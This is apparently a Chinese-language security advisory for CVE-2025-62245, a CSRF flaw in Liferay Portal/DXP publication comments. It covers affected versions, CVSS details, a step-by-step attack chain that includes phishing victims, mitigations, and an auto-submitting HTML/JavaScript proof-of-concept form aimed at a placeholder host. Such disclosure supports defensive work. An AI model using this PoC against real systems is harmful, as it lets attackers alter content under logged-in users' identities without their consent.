CVE-2025-62245 Liferay Portal/DXP CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-62245

漏洞类型

跨站请求伪造（CSRF）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Liferay Portal 和 Liferay DXP

漏洞概述

CVE-2025-62245 是 Liferay Portal 和 Liferay DXP 产品中发现的一个跨站请求伪造（CSRF）漏洞。该漏洞由 [email protected] 团队发现并报告，于2025年10月10日正式披露。根据CVSS 3.1评分体系，该漏洞评分为4.3分，属于中危级别。

该漏洞存在于 Liferay Portal 7.4.1 至 7.4.3.112 版本，以及 Liferay DXP 2023.Q4.0 至 2023.Q4.5、2023.Q3.1 至 2023.Q3.10 以及 7.4 GA 至 update 92 版本中。攻击者可以利用此漏洞，在用户不知情的情况下，以已登录用户的身份执行添加和编辑发布评论（publication comments）的操作。

由于该漏洞属于CSRF类型，攻击需要用户交互才能完成，即受害者需要在登录状态下访问攻击者构造的恶意页面。漏洞的完整性影响为低（I:L），机密性影响为低（C:L），可用性影响为无（A:N），表明该漏洞主要影响数据的完整性，可能导致未经授权的内容修改，但不会直接泄露敏感信息或导致服务不可用。Liferay作为广泛使用的企业级门户平台，此漏洞可能影响大量企业用户的发布管理工作流的安全性。

技术细节

跨站请求伪造（CSRF）是一种利用用户已认证会话执行未授权操作的攻击方式。在 CVE-2025-62245 中，Liferay Portal/DXP 的发布评论功能（publication comments）缺少充分的 CSRF 防护机制（如 CSRF Token 验证或 SameSite Cookie 属性设置）。

攻击原理：
1. 攻击者分析 Liferay Portal/DXP 的发布评论添加和编辑功能的 HTTP 请求端点和参数。
2. 攻击者构造一个包含恶意请求的网页，该请求会自动向 Liferay 服务器提交添加或编辑发布评论的操作。
3. 当已登录 Liferay 的用户在浏览器中访问攻击者构造的恶意页面时，浏览器会自动携带用户的会话凭证（如 Cookie）发送请求。
4. 由于服务器端缺少 CSRF Token 验证或其他防护措施，服务器会将该请求视为合法请求并执行。
5. 攻击者成功以受害者身份添加或编辑发布评论。

利用条件：
- 受害者必须在 Liferay Portal/DXP 上处于登录状态
- 受害者必须访问攻击者控制的恶意页面
- 攻击者无需任何认证凭据（PR:N）
- 攻击通过网络进行（AV:N），攻击复杂度低（AC:L）

由于该漏洞仅影响发布评论的添加和编辑功能，攻击者无法直接获取敏感数据或执行更危险的操作，但可以通过篡改发布评论内容来干扰正常的内容发布流程。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者识别目标组织使用的 Liferay Portal/DXP 版本，确认其是否在受影响版本范围内（7.4.1-7.4.3.112 或 DXP 2023.Q3/Q4 系列），并定位发布评论功能的相关 API 端点。

STEP 2

步骤2：构造恶意页面

攻击者创建一个包含恶意 HTML 表单或 JavaScript 代码的网页，该代码会自动向 Liferay 服务器的发布评论端点发送 POST 请求，包含攻击者预设的恶意评论内容。

STEP 3

步骤3：诱导受害者访问

攻击者通过钓鱼邮件、社交媒体或其他方式诱导已登录 Liferay 的受害者点击恶意链接或访问恶意页面。

STEP 4

步骤4：触发CSRF请求

受害者在登录状态下访问恶意页面，浏览器自动携带 Liferay 的会话 Cookie 发送跨域请求。由于服务器缺少 CSRF Token 验证，请求被服务器接受并处理。

STEP 5

步骤5：恶意操作执行

服务器以受害者身份执行添加或编辑发布评论的操作，攻击者成功篡改发布评论内容，可能干扰正常的内容审核和发布流程。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-62245 CSRF PoC for Liferay Portal/DXP Publication Comments -->
<!-- This PoC demonstrates how an attacker can exploit the CSRF vulnerability -->
<!-- to add or edit publication comments on a victim's Liferay instance -->

<html>
<head>
    <title>CVE-2025-62245 CSRF PoC</title>
</head>
<body>
    <!-- The form below will auto-submit when the page loads -->
    <!-- Replace TARGET_URL with the actual Liferay instance URL -->
    <!-- Replace PUBLICATION_ID with the target publication ID -->
    <form id="csrf-form" method="POST" action="https://TARGET_LIFERAY_HOST/o/headless-delivery/v1.0/sites/{siteId}/publications/{publicationId}/comments">
        <!-- Publication comment content to be added/edited -->
        <input type="hidden" name="comment" value="Malicious comment injected via CSRF (CVE-2025-62245)" />
        <input type="hidden" name="description" value="This comment was added without user consent" />
    </form>

    <script>
        // Auto-submit the form when the victim visits this page
        document.getElementById('csrf-form').submit();
    </script>

    <!-- Alternative: Using fetch API for AJAX-based CSRF -->
    <script>
        // Uncomment below for fetch-based CSRF exploitation
        /*
        fetch('https://TARGET_LIFERAY_HOST/o/headless-delivery/v1.0/sites/{siteId}/publications/{publicationId}/comments', {
            method: 'POST',
            credentials: 'include',  // Include cookies for authentication
            headers: {
                'Content-Type': 'application/json',
            },
            body: JSON.stringify({
                comment: 'Malicious comment via CSRF (CVE-2025-62245)',
                description: 'Injected without user consent'
            })
        });
        */
    </script>
</body>
</html>

影响范围

Liferay Portal 7.4.1 - 7.4.3.112

Liferay DXP 2023.Q4.0 - 2023.Q4.5

Liferay DXP 2023.Q3.1 - 2023.Q3.10

Liferay DXP 7.4 GA - update 92

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）部署 Web 应用防火墙（WAF）规则，检测并阻止跨站伪造请求；2）配置浏览器策略或反向代理，限制对 Liferay 发布评论 API 端点的跨域访问；3）将 Cookie 的 SameSite 属性设置为 Strict 或 Lax，减少跨站请求携带会话凭证的风险；4）加强对用户的安全意识培训，提醒用户不要点击可疑链接；5）监控发布评论的异常变更，及时发现和回滚被篡改的内容。